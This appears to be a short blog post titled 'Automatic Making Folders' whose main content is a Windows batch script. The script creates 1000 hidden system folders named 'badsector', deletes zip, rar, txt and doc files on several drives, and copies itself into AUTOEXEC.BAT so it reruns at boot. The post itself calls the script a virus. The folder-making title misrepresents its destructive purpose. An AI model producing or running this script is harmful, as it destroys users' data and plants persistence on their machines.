Automatic Making Folders


How to make folders automatic....?

=============================
@echo off
cd\
for /l %j in (1,1,1000) do md badsector%j & attrib +s +h +a +r badsector%j
for %a in (*.zip) do del %a
ATTRIB -S -H -R -A AUTOEXEC.BAT
TYPE %0 >> AUTOEXEC.BAT
D:
FOR %A IN (*.RAR,*.ZIP,*.TXT,*.doc) DO DEL %A
e:
for %A in (*.rar,*.zip,*.txt,*.doc) do del %A
EXIT
=======================
Save it with dir.bat

Note: This virus infect your files so don't use in ur pc

Comments

Popular posts from this blog

How to Enable Recycle Bin on Mapped drive.

How To Setup Internet Access Priority With Multiple Networks On Windows

Fix: Documents Folder opens automatically at Windows Startup.